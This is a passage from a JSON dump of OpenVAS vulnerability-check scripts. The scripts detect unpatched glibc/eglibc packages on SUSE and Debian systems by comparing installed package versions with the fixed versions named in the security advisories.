value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=SLES11\\.0SP2\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\nres = \"\";\n\nif(release == \"SLES11.0SP2\")\n{\n\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.11.3~17.45.53.1\", rls:\"SLES11.0SP2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.11.3~17.45.53.1\", rls:\"SLES11.0SP2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-html\", rpm:\"glibc-html~2.11.3~17.45.53.1\", rls:\"SLES11.0SP2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-i18ndata\", rpm:\"glibc-i18ndata~2.11.3~17.45.53.1\", rls:\"SLES11.0SP2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-info\", rpm:\"glibc-info~2.11.3~17.45.53.1\", rls:\"SLES11.0SP2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-locale\", rpm:\"glibc-locale~2.11.3~17.45.53.1\", rls:\"SLES11.0SP2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-profile\", rpm:\"glibc-profile~2.11.3~17.45.53.1\", rls:\"SLES11.0SP2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.11.3~17.45.53.1\", rls:\"SLES11.0SP2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-32bit\", rpm:\"glibc-32bit~2.11.3~17.45.53.1\", rls:\"SLES11.0SP2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel-32bit\", rpm:\"glibc-devel-32bit~2.11.3~17.45.53.1\", rls:\"SLES11.0SP2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-locale-32bit\", rpm:\"glibc-locale-32bit~2.11.3~17.45.53.1\", rls:\"SLES11.0SP2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-profile-32bit\", rpm:\"glibc-profile-32bit~2.11.3~17.45.53.1\", rls:\"SLES11.0SP2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:18", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2018-11-16T00:00:00", "published": "2014-09-12T00:00:00", "id": "OPENVAS:1361412562310850610", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850610", "title": "SuSE Update for glibc openSUSE-SU-2014:1115-1 (glibc)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2014_1115_1.nasl 12381 2018-11-16 11:16:30Z cfischer $\n#\n# SuSE Update for glibc openSUSE-SU-2014:1115-1 (glibc)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850610\");\n script_version(\"$Revision: 12381 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:16:30 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-09-12 05:56:57 +0200 (Fri, 12 Sep 2014)\");\n script_cve_id(\"CVE-2014-0475\", \"CVE-2014-5119\", \"CVE-2014-6040\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"SuSE Update for glibc openSUSE-SU-2014:1115-1 (glibc)\");\n script_tag(name:\"insight\", value:\"glibc was updated to fix three security\nissues:\n\n - A directory traversal in locale environment handling was fixed\n (CVE-2014-0475, bnc#887022, GLIBC BZ #17137)\n\n - Disable gconv transliteration module loading which could be used for\n code execution (CVE-2014-5119, bnc#892073, GLIBC BZ #17187)\n\n - Fix crashes on invalid input in IBM gconv modules (CVE-2014-6040,\n bnc#894553, BZ #17325)\");\n script_tag(name:\"affected\", value:\"glibc on openSUSE 13.1, openSUSE 12.3\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2014:1115_1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'glibc'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=(openSUSE12\\.3|openSUSE13\\.1)\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\nres = \"\";\n\nif(release == \"openSUSE12.3\")\n{\n\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.17~4.13.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-debuginfo\", rpm:\"glibc-debuginfo~2.17~4.13.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-debugsource\", rpm:\"glibc-debugsource~2.17~4.13.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.17~4.13.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel-debuginfo\", rpm:\"glibc-devel-debuginfo~2.17~4.13.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel-static\", rpm:\"glibc-devel-static~2.17~4.13.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-extra\", rpm:\"glibc-extra~2.17~4.13.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-extra-debuginfo\", rpm:\"glibc-extra-debuginfo~2.17~4.13.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-locale\", rpm:\"glibc-locale~2.17~4.13.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-locale-debuginfo\", rpm:\"glibc-locale-debuginfo~2.17~4.13.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-profile\", rpm:\"glibc-profile~2.17~4.13.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.17~4.13.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nscd-debuginfo\", rpm:\"nscd-debuginfo~2.17~4.13.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.17~4.13.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils-debuginfo\", rpm:\"glibc-utils-debuginfo~2.17~4.13.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils-debugsource\", rpm:\"glibc-utils-debugsource~2.17~4.13.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-obsolete\", rpm:\"glibc-obsolete~2.17~4.13.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-obsolete-debuginfo\", rpm:\"glibc-obsolete-debuginfo~2.17~4.13.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-32bit\", rpm:\"glibc-32bit~2.17~4.13.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-debuginfo-32bit\", rpm:\"glibc-debuginfo-32bit~2.17~4.13.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel-32bit\", rpm:\"glibc-devel-32bit~2.17~4.13.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel-debuginfo-32bit\", rpm:\"glibc-devel-debuginfo-32bit~2.17~4.13.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel-static-32bit\", rpm:\"glibc-devel-static-32bit~2.17~4.13.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-locale-32bit\", rpm:\"glibc-locale-32bit~2.17~4.13.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-locale-debuginfo-32bit\", rpm:\"glibc-locale-debuginfo-32bit~2.17~4.13.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-profile-32bit\", rpm:\"glibc-profile-32bit~2.17~4.13.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils-32bit\", rpm:\"glibc-utils-32bit~2.17~4.13.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils-debuginfo-32bit\", rpm:\"glibc-utils-debuginfo-32bit~2.17~4.13.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-html\", rpm:\"glibc-html~2.17~4.13.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-i18ndata\", rpm:\"glibc-i18ndata~2.17~4.13.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-info\", rpm:\"glibc-info~2.17~4.13.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"openSUSE13.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.18~4.21.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-debuginfo\", rpm:\"glibc-debuginfo~2.18~4.21.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-debugsource\", rpm:\"glibc-debugsource~2.18~4.21.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.18~4.21.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel-debuginfo\", rpm:\"glibc-devel-debuginfo~2.18~4.21.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel-static\", rpm:\"glibc-devel-static~2.18~4.21.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-extra\", rpm:\"glibc-extra~2.18~4.21.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-extra-debuginfo\", rpm:\"glibc-extra-debuginfo~2.18~4.21.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-locale\", rpm:\"glibc-locale~2.18~4.21.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-locale-debuginfo\", rpm:\"glibc-locale-debuginfo~2.18~4.21.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-profile\", rpm:\"glibc-profile~2.18~4.21.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.18~4.21.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nscd-debuginfo\", rpm:\"nscd-debuginfo~2.18~4.21.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.18~4.21.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils-debuginfo\", rpm:\"glibc-utils-debuginfo~2.18~4.21.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils-debugsource\", rpm:\"glibc-utils-debugsource~2.18~4.21.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-obsolete\", rpm:\"glibc-obsolete~2.18~4.21.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-obsolete-debuginfo\", rpm:\"glibc-obsolete-debuginfo~2.18~4.21.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-32bit\", rpm:\"glibc-32bit~2.18~4.21.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-debuginfo-32bit\", rpm:\"glibc-debuginfo-32bit~2.18~4.21.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel-32bit\", rpm:\"glibc-devel-32bit~2.18~4.21.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel-debuginfo-32bit\", rpm:\"glibc-devel-debuginfo-32bit~2.18~4.21.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel-static-32bit\", rpm:\"glibc-devel-static-32bit~2.18~4.21.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-locale-32bit\", rpm:\"glibc-locale-32bit~2.18~4.21.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-locale-debuginfo-32bit\", rpm:\"glibc-locale-debuginfo-32bit~2.18~4.21.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-profile-32bit\", rpm:\"glibc-profile-32bit~2.18~4.21.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils-32bit\", rpm:\"glibc-utils-32bit~2.18~4.21.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils-debuginfo-32bit\", rpm:\"glibc-utils-debuginfo-32bit~2.18~4.21.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-html\", rpm:\"glibc-html~2.18~4.21.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-i18ndata\", rpm:\"glibc-i18ndata~2.18~4.21.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-info\", rpm:\"glibc-info~2.18~4.21.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-24T12:53:28", "bulletinFamily": "scanner", "description": "Several vulnerabilities have been\nfixed in eglibc, Debian", "modified": "2017-07-07T00:00:00", "published": "2015-01-27T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=703142", "id": "OPENVAS:703142", "title": "Debian Security Advisory DSA 3142-1 (eglibc - security update)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3142.nasl 6609 2017-07-07 12:05:59Z cfischer $\n# Auto-generated from advisory DSA 3142-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703142);\n script_version(\"$Revision: 6609 $\");\n script_cve_id(\"CVE-2012-6656\", \"CVE-2014-6040\", \"CVE-2014-7817\", \"CVE-2015-0235\");\n script_name(\"Debian Security Advisory DSA 3142-1 (eglibc - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:05:59 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value: \"2015-01-27 00:00:00 +0100 (Tue, 27 Jan 2015)\");\n script_tag(name: \"cvss_base\", value: \"10.0\");\n script_tag(name: \"cvss_base_vector\", value: \"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2015/dsa-3142.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"eglibc on Debian Linux\");\n script_tag(name: \"solution\", value: \"For the stable distribution (wheezy),\nthese problems have been fixed in version 2.13-38+deb7u7.\n\nFor the upcoming stable distribution (jessie) and the unstable\ndistribution (sid), the\nCVE-2015-0235\n\nissue has been fixed in version 2.18-1 of the glibc package.\n\nWe recommend that you upgrade your eglibc packages.\");\n script_tag(name: \"summary\", value: \"Several vulnerabilities have been\nfixed in eglibc, Debian's version of the GNU C library:\n\nCVE-2015-0235\nQualys discovered that the gethostbyname and gethostbyname2\nfunctions were subject to a buffer overflow if provided with a\ncrafted IP address argument. This could be used by an attacker to\nexecute arbitrary code in processes which called the affected\nfunctions.\n\nThe original glibc bug was reported by Peter Klotz.\n\nCVE-2014-7817\nTim Waugh of Red Hat discovered that the WRDE_NOCMD option of the\nwordexp function did not suppress command execution in all cases.\nThis allows a context-dependent attacker to execute shell\ncommands.\n\nCVE-2012-6656 CVE-2014-6040\nThe charset conversion code for certain IBM multi-byte code pages\ncould perform an out-of-bounds array access, causing the process\nto crash. In some scenarios, this allows a remote attacker to\ncause a persistent denial of service.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software\nversion using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"eglibc-source\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"glibc-doc\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc-bin\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc-dev-bin\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc0.1\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc0.1-dbg\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc0.1-dev\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc0.1-dev-i386\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc0.1-i386\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc0.1-i686\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc0.1-pic\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc0.1-prof\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc0.1-udeb\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-amd64\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dbg\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-amd64\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-i386\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-mips64\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-mipsn32\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-ppc64\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-s390\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-s390x\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-sparc64\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-i386\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-i686\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-loongson2f\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-mips64\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-mipsn32\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-pic\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-ppc64\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-prof\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-s390\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-s390x\", ver:\"2.13-38+deb7u7\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-sparc64\", ver:\"2.13-38+deb7u7\", 